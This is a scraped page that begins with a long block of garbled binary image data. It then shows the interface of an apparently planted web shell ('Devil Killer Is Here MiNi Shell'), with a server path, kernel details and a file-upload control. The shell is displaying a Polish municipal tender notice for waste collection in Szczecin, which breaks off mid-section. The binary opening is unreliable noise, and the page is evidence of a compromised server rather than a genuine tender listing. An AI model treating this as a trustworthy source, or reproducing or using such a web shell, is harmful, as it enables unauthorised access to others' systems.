JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20221201/0046935301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór odpadów komunalnych wytworzonych <br/>na obiektach Zakładu Usług Komunalnych w Szczecinie (w podziale na części) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Szczecin - Zakład Usług Komunalnych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684232</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ku Słońcu 125A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">71-080</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">48 57 141</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">klaudia.szuba@zuk.szczecin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zuk.szczecin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór odpadów komunalnych wytworzonych <br/>na obiektach Zakładu Usług Komunalnych w Szczecinie (w podziale na części) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-47fbaceb-714d-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00469353</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00017930/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.10 Odbiór odpadów komunalnych wytworzonych na obiektach Zakładu Usług Komunalnych w Szczecinie (w podziale na części)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.platformazakupowa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej, zostały opisane w Regulaminie Internetowej Platformy zakupowej platformazakupowa.pl Open Nexus Sp. z o.o. pod adresem: https://platformazakupowa.pl/strona/1-regulamin<br/>2. Instrukcje korzystania z Platformy dotyczące w szczególności składania wniosków o wyjaśnienie treści SWZ, składania ofert, wysyłania i odbierania dokumentów oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla<br/>Wykonawców” na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), zwanego dalej „RODO”, informuję, że: administratorem Pani/Pana danych osobowych jest Zakład Usług Komunalnych z siedzibą w Szczecinie przy ul. Ku Słońcu 125A; kontakt z Inspektorem Ochrony Danych w Zakładzie Usług Komunalnych w Szczecinie jest możliwy pod numerem telefonu 9148 57 132 oraz adresem email: iod@zuk.szczecin.pl, Pani/Pana<br/>dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „<br/>„Odbiór odpadów komunalnych wytworzonych na obiektach Zakładu Usług Komunalnych w Szczecinie (w podziale na części)”, prowadzonym w trybie podstawowym; odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz.U. z 2022 r. poz. 1710 ze zmianami), dalej „ustawa Pzp”; Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały okres obowiązywania umowy w sprawie zamówienia publicznego; obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), zwanego dalej „RODO”, informuję, że: posiada Pani/Pan:− na podstawie art. 15 RODO prawo dostępu do danych osobowych,− na podstawie art. 16 RODO prawo do sprostowania danych osobowych (skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu postępowania oraz jego załączników);− na podstawie art. 18 RODO prawo żądania od zamawiającego ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2<br/>RODO;− prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">C/4/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. część I obejmuje:<br/> a) odbiór i transport odpadów do regionalnej instalacji przetwarzania odpadów komunalnych właściwej dla Gminy Miasto Szczecin,<br/> b) wyposażenie obiektów od dnia 05 kwietnia 20223 r. do dnia 15 grudnia 2023 r. <br/> w szczelne kontenery odpowiadające polskiej normie PN-EN 840 wg poniższej<br/> specyfikacji: <br/> A. Kompleks Rekreacyjny Arkonka: 1 kontener o poj. 5 m3,<br/> B. kąpielisko Dąbie: 1 kontener o poj. 5 m3,<br/> C. kąpielisko Dziewoklicz: 1 kontener o poj. 5 m3,<br/> D. kąpielisko Głębokie: 1 kontener o poj. 5 m3,<br/> c)	częstotliwość odbioru odpadów – w ciągu 24 godzin od zgłoszenia przez Zamawiającego (z wyłączeniem dni ustawowo wolnych od pracy), <br/> d)	przewidywana szacunkowa roczna ilość odpadów: 45 Mg, w tym:<br/> - kąpielisko Dąbie: 13 Mg,<br/> - Kompleks Rekreacyjny Arkonka: 20 Mg,<br/> - kąpielisko Dziewoklicz: 5 Mg,<br/> - kąpielisko Głębokie: 7 Mg,<br/>2. Pojemniki przeznaczone do selektywnej zbiórki odpadów komunalnych powinny być jednoznacznie oznakowane piktogramami właściwymi dla danej frakcji selektywnie zbieranych odpadów komunalnych.<br/>3. Zamawiający dopuszcza możliwość telefonicznej formy powiadamiania Wykonawcy o konieczności dokonania odbioru odpadów ze wskazanego obiektu Zakładu Usług Komunalnych, potwierdzonego następnie drogą elektroniczną.<br/> 4.	Wykonawca wykona przedmiot zamówienia z najwyższą starannością wymaganą od podmiotu profesjonalnie świadczącego tego typu usługi, na zasadzie zapewnienia najwyższej jakości prac, zgodnie z przepisami prawa powszechnie obowiązującego, a także SWZ i z ofertą, które będą stanowiły integralną część umowy.<br/>5. Wykonawca zapewni, we flocie pojazdów używanych przy wykonywaniu przedmiotu zamówienia, co najmniej 10 % udział pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym w rozumieniu ustawy z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-04-05 do 2023-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty najkorzystniejszej, spośród ofert nie podlegających odrzuceniu, zostanie dokonany według następujących kryteriów oceny ofert: <br/><br/>1)	cena – 60 %<br/> Wykonawca w tym kryterium może otrzymać maksymalnie 60 pkt.<br/>	Sposób przyznania punktów w kryterium „cena” (C): <br/> <br/> C = najniższa cena / cena w ofercie ocenianej x 100 pkt x 60 %<br/> <br/>2) wysokość kary umownej za każdy dzień zwłoki w wykonaniu usługi – 20 %<br/> Wykonawca w tym kryterium może otrzymać maksymalnie 20 pkt.<br/>Sposób przyznania punktów w kryterium „wysokość kary umownej” (K):<br/><br/>Punkty zostaną przyznane w zależności od wysokości zaproponowanej przez Wykonawcę kary umownej za zwłokę w wykonaniu przedmiotu umowy w terminie, <br/>o którym mowa w umowie (każdorazowe niewykonanie usługi w ciągu 24 godzin <br/>od zgłoszenia przez Zamawiającego), w następujący sposób: <br/> a) jeżeli Wykonawca zaproponuje karę umowną w wysokości 50,00 zł za każdy dzień<br/> zwłoki – 20 pkt<br/>b) jeżeli Wykonawca zaproponuje karę umowną w wysokości 40,00 zł za każdy dzień<br/> zwłoki – 10 pkt<br/> c) jeżeli Wykonawca zaproponuje karę umowną w wysokości 30,00 zł za każdy dzień<br/> zwłoki – 0 pkt<br/><br/>Jeżeli Wykonawca zaproponuje karę umowną w wysokości mniejszej niż 30,00 zł, wówczas oferta zostanie odrzucona.<br/>Jeżeli Wykonawca zaproponuje karę umowną w wysokości większej niż 50,00 zł, wówczas do oceny ofert zostanie przyjęta maksymalna wysokość kary umownej, czyli 50,00 zł. <br/><br/>3) poziom emisji spalin – 20 % <br/> Wykonawca w tym kryterium może otrzymać maksymalnie 20 pkt.<br/>	Sposób przyznania punktów w kryterium „poziom emisji spalin” (E): <br/>Punkty zostaną przyznane w zależności od zaproponowanego przez Wykonawcę samochodu, w następujący sposób: <br/>a)	jeżeli Wykonawca zaproponuje samochód o poziomie emisji spalin Euro 4 – 0 pkt<br/>b)	jeżeli Wykonawca zaproponuje samochód o poziomie emisji spalin Euro 5 – 10 pkt<br/>c)	jeżeli Wykonawca zaproponuje samochód o poziomie emisji spalin Euro 6 – 20 pkt<br/><br/>Jeżeli Wykonawca zaproponuje samochód o poziomie emisji spalin mniejszej niż Euro 4, wówczas oferta zostanie odrzucona.<br/><br/>S = C + K+ E<br/><br/>2. Największa ilość punktów (S) wyliczonych w powyższy sposób decyduje o uznaniu oferty za najkorzystniejszą.<br/>3. Ocena ofert zostanie dokonana odrębnie dla każdej części przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Poziom emisji spalin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. część II obejmuje:<br/> a) odbiór i transport odpadów do regionalnej instalacji przetwarzania odpadów<br/> komunalnych właściwej dla Gminy Miasto Szczecin,<br/> b)	wyposażenie obiektów w pojemniki i kontenery odpowiadające polskiej normie <br/> PN-EN 840 wg poniższej specyfikacji:<br/> - kąpieliska miejskie i Arkonka:<br/> A. kąpielisko Dąbie: <br/> w okresie od dnia zawarcia umowy do dnia 31 grudnia 2023 r. - 1 pojemnik<br/> o poj. 1100 l, a dodatkowo w okresie od dnia 1 kwietnia 2023 r. do dnia <br/> 30 września 2023 r. - 1 kontener o poj. 5 m3,<br/> B. kąpielisko Głębokie: <br/> w okresie od dnia zawarcia umowy do dnia 31 grudnia 2023 r. - 2 pojemniki<br/> każdy o poj. 1100 l , a dodatkowo w okresie od dnia 14 kwietnia 2023 r. do dnia <br/> 30 września 2023 r. - 1 kontener o poj. 5 m3,<br/> C. kąpielisko Dziewoklicz: <br/> w okresie od dnia zawarcia umowy do dnia 31 grudnia 2023 r. - 1 pojemnik<br/> o poj. 1100 l, a dodatkowo w okresie od dnia 14 kwietnia 2023 r. do dnia <br/> 30 września 2023 r. - 1 kontener o poj. 5 m3,<br/> D. Kompleks Rekreacyjny Arkonka: <br/> w okresie od dnia zawarcia umowy do dnia 31 grudnia 2023 r. - 1 pojemnik<br/> o poj. 1100 l, a dodatkowo: w okresie od dnia 22 maja 2023 r. do dnia <br/> 18 września 2023 r. – 7 pojemników każdy o poj. 1100 l i w okresie od dnia <br/> 22 maja 2023 r. do dnia 12 września 2023 r. 1 kontener o poj. 5 m3,<br/> - szalety miejskie:<br/>A.	szalety: ul. Wyszyńskiego, pl. Kościuszki (zieleniec), Brama Portowa, Basen Górniczy (pętla autobusowa), ul. Komandorska, Pl. Hołdu Pruskiego – <br/>po 1 pojemniku każdy o poj. 120 l,<br/>B.	szalet: ul. Fałata – 1 pojemnik o poj. 1100 l,<br/> - Ekoporty:<br/>A.	Ekoporty: ul. Arkońska 39-40, ul. Gdańska 3i, ul. Firlika 31, ul. Górna 3b, <br/>ul. Taczaka/Witkiewicza, ul. Kołbacka/Przyszłości, ul. Helska – <br/>po 1 pojemniku każdy o poj. 1100 l,<br/>B.	Ekoport: ul. Leszczynowa – 2 pojemniki każdy o poj. 1 100 l,<br/> - siedziba ZUK i inne obiekty:<br/> A. ul. Ku Słońcu 125A (siedziba ZUK prawe skrzydło) – 1 pojemnik o poj. <br/> 1100 l,<br/> B. ul. Ku Słońcu 125A (siedziba ZUK lewe skrzydło) – 1 pojemnik o poj. <br/> 1100 l,<br/> C. ul. Ku Słońcu 124A – 1 pojemnik o poj. 120 l,<br/> D. ul. Owczary 3 (Gajówka) – 1 pojemnik o poj. 240 l,<br/> - Schronisko dla Bezdomnych Zwierząt przy ul. Południowej (w budowie):<br/> A. 2 pojemniki każdy o poj. 1 100 l,<br/> - lasy miejskie:<br/> A. ul. Czarnogórska 63 (Leśnictwo Dąbie) – 1 pojemnik o poj. 110 l,<br/> B. ul. Miodowa 3 (Leśniczówka Biała) – 1 pojemnik o poj. 240 l,<br/> - cmentarze komunalne:<br/>A.	ul. Bronowicka (Cmentarz Zachodni) – 1 pojemnik o poj. 120 l,<br/>B.	ul. Ku Słońcu 125A (krematorium na Cmentarzu Centralnym) – 1 pojemnik <br/>o poj. 1100 l, <br/> c) częstotliwość odbioru odpadów – w ciągu 24 godzin od zgłoszenia przez<br/> Zamawiającego (z wyłączeniem dni ustawowo wolnych od pracy) nie rzadziej niż:<br/> - kąpieliska miejskie i Arkonka:<br/>A.	kąpieliska: Dąbie, Dziewoklicz, Głębokie – 1 raz w miesiącu dla pojemników o poj. 1 100 l,<br/>B.	Kompleks Rekreacyjny Arkonka:<br/> – 1 raz w tygodniu (poniedziałek) dla pojemnika o poj. 1 100 l,<br/> - w okresie od dnia 22 maja 2023 r. do dnia 18 września 2023 r. – <br/>z 7 pojemników o poj. 1100 l – 2 razy w tygodniu (poniedziałek i czwartek),<br/>C.	kąpieliska: Dąbie, Głębokie i Kompleks Rekreacyjny Arkonka – z kontenerów o poj. 5 m3 – na zgłoszenie Zamawiającego,<br/> - szalety miejskie:<br/>A.	szalety: ul. Wyszyńskiego, pl. Kościuszki (zieleniec), Brama Portowa, Basen Górniczy (pętla autobusowa), ul. Komandorska, Pl. Hołdu Pruskiego – <br/>1 raz w tygodniu,<br/>B.	szalet: ul. Fałata – w okresie od dnia zawarcia umowy do dnia 03 czerwca <br/>2023 r. i od dnia 18 września 2023 r. do dnia 31 grudnia 2023 r. – 1 raz <br/>w tygodniu,<br/> - Ekoporty:<br/>A.	Ekoporty: ul. Kołbacka/Przyszłości, ul. Helska, ul. Gdańska, ul. Górna ul. Firlika, ul. Leszczynowa – 1 raz w tygodniu,<br/>B.	Ekoporty: ul. Arkońska 39-40, ul. Taczaka/Witkiewicza – 2 razy w tygodniu, <br/> - siedziba ZUK i inne obiekty:<br/> A. 1 raz w tygodniu,<br/> - Schronisko dla Bezdomnych Zwierząt przy ul. Południowej (w budowie):<br/> A. 1 raz w tygodniu,<br/> - lasy miejskie:<br/> A. 1 raz w tygodniu,<br/> - cmentarze komunalne:<br/> A. 1 raz w tygodniu,<br/> d)	przewidywana szacunkowa roczna ilość odpadów: 1 589 m3, w tym: <br/> A. kąpieliska miejskie: 570 m3,<br/> B. szalety miejskie: 87 m3,<br/> C. Ekoporty: 585 m3,<br/> D. siedziba ZUK i inne obiekty: 140 m3,<br/> E. Schronisko dla Bezdomnych Zwierząt: 120 m3,<br/><br/> F. lasy miejskie: 20 m3,<br/> G. cmentarze komunalne: 67 m3,<br/>2.Pojemniki przeznaczone do selektywnej zbiórki odpadów komunalnych powinny być jednoznacznie oznakowane piktogramami właściwymi dla danej frakcji selektywnie zbieranych odpadów komunalnych.<br/>3. Zamawiający dopuszcza możliwość telefonicznej formy powiadamiania Wykonawcy o konieczności dokonania odbioru odpadów ze wskazanego obiektu Zakładu Usług Komunalnych, potwierdzonego następnie drogą elektroniczną.<br/> 4.	